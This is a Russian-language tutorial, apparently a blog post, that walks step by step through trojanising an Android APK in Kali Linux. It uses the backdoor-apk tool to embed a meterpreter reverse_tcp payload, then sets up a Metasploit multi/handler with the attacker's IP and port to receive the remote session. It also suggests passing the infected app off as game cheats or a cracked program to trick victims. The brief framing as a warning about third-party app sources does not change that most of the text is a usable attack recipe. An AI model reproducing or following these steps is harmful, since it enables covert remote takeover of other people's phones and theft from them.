Всем привет
Уверен на вашем смартфоне установлен не один десяток различных приложений. Это и мессенджеры, и приложения для работы с документами, игры и т.д. Если вы скачиваете всё это исключительно в Play Market, значит риск натолкнуться на вредоносное ПО - минимальный, хотя и не нулевой (да, даже там можно встретить приложения с троянами).
Однако есть и те, кто скачивает программы из сторонних источников. В этом случае шанс начнутся на вредонос резко возрастает, ведь вшить самую обычную полезную нагрузку в apk не так сложно, и с этим может справиться любой школьник.
Сейчас я продемонстрирую один из самых простых способов заражения apk файла
Работать мы будем в Kali Linux. Если вы впервые слышите о данной ОС, то можете прочитать эту статью. Также в интернете полной гайдов, как установить данную систему на виртуальную машину.
Запускаем Kali, открываем терминал и для начала поищем обновления
sudo apt update
sudo apt upgrade
После этого установим необходимые компоненты:
sudo apt install smali
sudo apt install apktool
sudo apt-get install lib32stdc++6 lib32z1
Теперь клонируем сам репозиторий с программой с github:
git clone https://github.com/dana-at-cp/backdoor-apk.git
Переходим в нужную директорию:
cd backdoor-apk
cd backdoor-apk (да, два раза)
Естественно нам понадобится сам apk, который мы будем заражать. Найти его можно, например, на pdalife. Скачиваем apk и кидаем его в эту же директорию (там где находится файл backdoor-apk.sh)
Запускаем программу
./backdoor-apk.sh оригинальный.apk
Например, ./backdoor-apk.sh Drive.apk
Осталось настроить параметры полезной нагрузки.
- Сначала указываем тип, я выбрал meterpreter/reverse_tcp
- Затем Ваш IP (можно узнать прописав команду ifconfig)
- Далее порт, через который будет идти соединение (не забудьте потом его открыть)
- И в конце вид слияния полезной нагрузки и оригинального apk. Я выбрал 2 вариант.
После этого запустится процесс сборки. Пример успешной сборки
Далее можно закинуть данный apk под видом читов, взломанной версии игры или программы и всё. Однако показывать, как это делается, я уже не буду, чтобы не выходить за определенные рамки.
Чтобы подключиться к жертве, открываем Metasploit (командой msfconsole) и прописываем:
use multi/handler
set payload android/meterpreter/reverse_tcp (или другой тип нагрузки, который вы выбрали в начале)
set lhost ваш_IP
В моем случае: set lhost 192.168.200.132
set lport 4444
exploit
После того, как жертва запустит apk, у вас появится сессия meterpreter.